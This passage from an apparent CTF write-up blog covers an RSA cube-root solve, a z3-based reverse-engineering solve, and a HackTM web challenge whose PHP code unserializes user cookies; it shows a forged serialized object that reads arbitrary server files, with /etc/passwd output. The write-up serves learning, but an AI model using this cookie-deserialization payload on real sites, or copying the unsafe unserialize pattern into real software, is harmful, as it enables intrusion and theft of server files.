c = 527715545190279160683427564102415343921040361668522479441727171363460126920288425567651662947621100428078618585624707291232885706132068328305084115992340337032439274527186826778447854890982475878955397378947713414201050357209397140391734937299379698886378260075489810871914081834819238233619226377140629000968272406078503709732856007314599153696811725183993977424740513321277346005097500256459835713834182894305536107589525724571208098322359262186595358977825573193007799376102473240254372327730839223120373818874006086733633525830272119104666835113980722223258389364156995110666626033474727892354233040278510447646
i = 0
while True:
    res = gmpy2.iroot(c+i*n,3)
    if res[1]:
        print(libnum.n2s(int(res[0])))
        break
    i += 1
# OSC{C0N6r47U14710N5!_Y0U_UND3r574ND_H0W_70_U53_H4574D5_8r04DC457_4774CK_______0xL4ugh}

… and we succeed in one attempt. It seems the intented solution was the Hastad’s Broadcast Attack.

Easy-Peasy

source:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // rbx
  void **v4; // rdx
  void **v5; // rax
  __int64 v6; // rax
  void **v7; // rdx
  __int64 v8; // rax
  void *v9; // rcx
  int v11[6]; // [rsp+20h] [rbp-50h]
  __int16 v12; // [rsp+38h] [rbp-38h]
  char v13; // [rsp+3Ah] [rbp-36h]
  __int64 v14; // [rsp+40h] [rbp-30h]
  void *Block[2]; // [rsp+48h] [rbp-28h] BYREF
  __int64 v16; // [rsp+58h] [rbp-18h]
  unsigned __int64 v17; // [rsp+60h] [rbp-10h]

  v14 = -2i64;
  v11[0] = 1947518052;
  v11[1] = 84227255;
  v11[2] = -181070859;
  v11[3] = -972881100;
  v11[4] = 1396909045;
  v11[5] = 1396929315;
  v12 = -10397;
  v13 = 0;
  v3 = 0i64;
  v16 = 0i64;
  v17 = 15i64;
  LOBYTE(Block[0]) = 0;
  sub_140001350(Block);
  sub_1400015D0(std::cout, "Enter The Flag: ");
  sub_140001A50(std::cin, Block);
  if ( v16 == 26 )
  {
    while ( 1 )
    {
      v4 = Block;
      if ( v17 >= 0x10 )
        v4 = (void **)Block[0];
      v5 = Block;
      if ( v17 >= 0x10 )
        v5 = (void **)Block[0];
      if ( *((unsigned __int8 *)v11 + v3) != ((*((char *)v4 + v3) >> 4) | (16 * (*((_BYTE *)v5 + v3) & 0xF))) )
        break;
      if ( ++v3 >= 26 )
      {
        v6 = sub_1400015D0(std::cout, "The Flag is: ");
        v7 = Block;
        if ( v17 >= 0x10 )
          v7 = (void **)Block[0];
        sub_140001C50(v6, v7, v16);
        goto LABEL_12;
      }
    }
  }
  v8 = sub_1400015D0(std::cout, "This will not work");
  std::ostream::operator<<(v8, sub_1400017A0);
LABEL_12:
  if ( v17 >= 0x10 )
  {
    v9 = Block[0];
    if ( v17 + 1 >= 0x1000 )
    {
      v9 = (void *)*((_QWORD *)Block[0] - 1);
      if ( (unsigned __int64)(Block[0] - v9 - 8) > 0x1F )
        invalid_parameter_noinfo_noreturn();
    }
    j_j_free(v9);
  }
  return 0;
}

Solution:

Use z3-solver to solve the constraints. Put the data into hex view to better fit it into python.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from z3 import *
c = bytes.fromhex('64 C4 14 74 B7 34 05 05 F5 13 35 F5 34 03 03 C6 F5 23 43 53 23 73 43 53 63 D7')
n = len(c)
m = [BitVec(f'm_{i}',8) for i in range(n)]
s = Solver()
for i in range(n):
	s.add(c[i] == ((m[i] >> 4) | (16 * (m[i] & 0xF))))
if s.check() == sat:
	m = bytes([s.model().eval(m[i]).as_long() for i in range(n)])
	print(m)
else:
	print('unsat')

# FLAG{CPP_1S_C00l_24527456}

Finally, remember to change the flag format to 0xL4ugh{}.

HackTM CTF Quals 2023

blog (solved after the game)

key codes:

index.php:

1
2
3
4
5
6
7
8
9
<?php
include("util.php");
if (!isset($_COOKIE["user"])) {
    header("Location: /login.php");
    die();
} else {
    $user = unserialize(base64_decode($_COOKIE["user"]));
}
?>

util.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
<?php
class Post {
    public $title;
    public $content;
    public $comments;

    public function __construct($title, $content) {
        $this->title = $title;
        $this->content = $content;
    }

    public function __toString() {
        $comments = $this->comments;
        // comments are bugged for now, but in future it might be re-implemented
        // when it is, just append $comments_fallback to $out
        if ($comments !== null) {
            $comments_fallback = $this->$comments;
        }

        $conn = new Conn;
        $conn->queries = array(new Query(
            "select id from posts where title = :title and content = :content",
            array(":title" => $this->title, ":content" => $this->content)
        ));
        $result = $conn();
        if ($result[0] === false) {
            return "";
        } else {
            return "
            <div class='card'> 
                <h3 class='card-header'>{$this->title}</h3>
                <div class='card-body'>
                    <p class='card-text'>{$this->content}</p>
                </div>
                <div class='card-footer'>
                    <input class='input-group-text' style='font-size: 12px;' disabled value='Commenting is disabled.' />
                </div>
            </div>
            ";
        }
    }
}

class User {
    public $profile;
    public $posts = array();

    public function __construct($username) {
        $this->profile = new Profile($username);
    }

    // get user profile
    public function get_profile() {
        // some dev apparently mixed up user and profile... 
        // so this check prevents any more errors
        if ($this->profile instanceof User) {
            return "@i_use_vscode please fix your code";
        } else {
            // quite unnecessary to assign to a variable imho
            $profile_string = "
            <div>{$this->profile}</div>
            ";
            return $profile_string;
        }
    }

    public function get_posts() {
        // check if we've already fetched posts before to save some overhead
        // (our poor sqlite db is dying)
        if (sizeof($this->posts) !== 0) {
            return "Please reload the page to fetch your posts from the database";
        }

        // get all user posts
        $conn = new Conn;
        $conn->queries = array(new Query(
            "select title, content from posts where user = :user",
            array(":user" => $this->profile->username)
        ));

        // get posts from database
        $result = $conn();
        if ($result[0] !== false) {
            while ($row = $result[0]->fetchArray(1)) {
                $this->posts[] = new Post($row["title"], $row["content"]);
            }
        }

        // build the return string
        $out = "";
        foreach ($this->posts as $post) {
            $out .= $post;
        }
        return $out;
    }

    // who put this?? git blame moment (edit: i checked, it's @i_use_vscode as usual)
    public function __toString() {
        $profile = $this->profile;
        return $profile();
    }
}

class Profile {
    public $username;
    public $picture_path = "images/real_programmers.png";

    public function __construct($username) {
        $this->username = $username;
    }

    // hotfix for @i_use_vscode (see line 97)
    // when removed, please remove this as well
    public function __invoke() {
        if (gettype($this->picture_path) !== "string") {        
            return "<script>window.location = '/login.php'</script>";
        }

        $picture = base64_encode(file_get_contents($this->picture_path));

        // check if user exists
        $conn = new Conn;
        $conn->queries = array(new Query(
            "select id from users where username = :username",
            array(":username" => $this->username)
        ));
        $result = $conn();
        if ($result[0] === false || $result[0]->fetchArray() === false) {
            return "<script>window.location = '/login.php'</script>";
        } else {
            return "
            <div class='card'>
                <img class='card-img-top profile-pic' src='data:image/png;base64,{$picture}'> 
                <div class='card-body'>
                    <h3 class='card-title'>{$this->username}</h3>
                </div>
            </div>
            ";
        }
    }

    // this is the correct implementation :facepalm:
    public function __toString() {
        if (gettype($this->picture_path) !== "string") {        
            return "";
        }

        $picture = base64_encode(file_get_contents($this->picture_path));

        // check if user exists
        $conn = new Conn;
        $conn->queries = array(new Query(
            "select id from users where username = :username",
            array(":username" => $this->username)
        ));
        $result = $conn();
        if ($result[0] === false || $result[0]->fetchArray() === false) {
            return "<script>window.location = '/login.php'</script>";
        } else {
            return "
            <div class='card'>
                <img class='card-img-top profile-pic' src='data:image/png;base64,{$picture}'> 
                <div class='card-body'>
                    <h3 class='card-title'>{$this->username}</h3>
                </div>
            </div>
            ";
        }
    }
}

class Conn {
    public $queries;

    // old legacy code - idk what it does but not touching it...
    public function __invoke() {
        $conn = new SQLite3("/sqlite3/db");
        $result = array();

        // on second thought, whoever wrote this is a genius
        // its gotta be @i_use_neovim
        foreach ($this->queries as $query) {
            if (gettype($query->query_string) !== "string") {
                return "Invalid query.";
            }
            $stmt = $conn->prepare($query->query_string);
            foreach ($query->args as $param => $value) {
                if (gettype($value) === "string" || gettype($value) === "integer") {
                    $stmt->bindValue($param, $value);
                } else {
                    $stmt->bindValue($param, "");
                }
            }
            $result[] = $stmt->execute();
        }

        return $result;
    }
}

class Query {
    public $query_string = "";
    public $args;

    public function __construct($query_string, $args) {
        $this->query_string = $query_string;
        $this->args = $args;
    }

    // for debugging purposes
    public function __toString() {
        return $this->query_string;
    }
}
?>

login.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
include("util.php");
if ($_SERVER["REQUEST_METHOD"] === "POST") {
    $username = $_POST["username"];
    $password = $_POST["password"];
    $conn = new Conn;
    $conn->queries = array(new Query(
        "select username from users where username = :username and password = :password",
        array(":username" => $username, ":password" => $password)
    ));
    $result = $conn();
    if ($result[0] !== false && $result[0]->fetchArray()) {
        $user = new User($username);
        setcookie("user", base64_encode(serialize($user)));
        echo "
        <script>
            window.location = '/index.php'
        </script>";
    }
}
?>

From the code we know the cookie was created by base64_encode(serialize($user)), so we can forge arbitrary identity by tampering with the cookie.

At first, I change to the admin’s account, only to see many first comers showing the xss on admin’s blog.

In fact, there’s another significant place to exploit: the profile picture.

1
$picture = base64_encode(file_get_contents($this->picture_path));

By using the file_get_contents() function, we can read any file on the server (within the user-level permission).

Like /etc/passwd:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

/etc/group:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:
audio:x:29:
dip:x:30:
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:

but wait, where’s the flag? The flag is our final target.

I tried /flag, ./flag, /flag.txt, ./flag.txt, /home/{username}/flag.txt and etc., but none of them work.

It was not until the game ended that I realized there was even a Dockerfile… (outside the chal/ folder)

1
2
3
4
5
6
7
FROM php:8.0-apache

COPY ./chal/html /var/www/html
COPY ./chal/db /sqlite3/db
COPY ./chal/flag.txt /02d92f5f-a58c-42b1-98c7-746bbda7abe9/flag.txt
RUN chmod -R 777 /sqlite3/
RUN chmod -R 777 /var/www/html/

The path is given in the dockerfile! So the problem was solved:

1
O:4:"User":2:{s:7:"profile";O:7:"Profile":2:{s:8:"username";s:10:"aaa34rterf";s:12:"picture_path";s:46:"/02d92f5f-a58c-42b1-98c7-746bbda7abe9/flag.txt";}s:5:"posts";a:0:{}}
1
<img class="card-img-top profile-pic" src="">
1
HackTM{r3t__toString_1s_s0_fun_13c573f6}

What a pity! Remember to check every file given by the challenge carefully next time!

This post is licensed under CC BY 4.0 by the author.

LA CTF 2023 Writeup

osu!gaming CTF 2024 Writeup

Trending Tags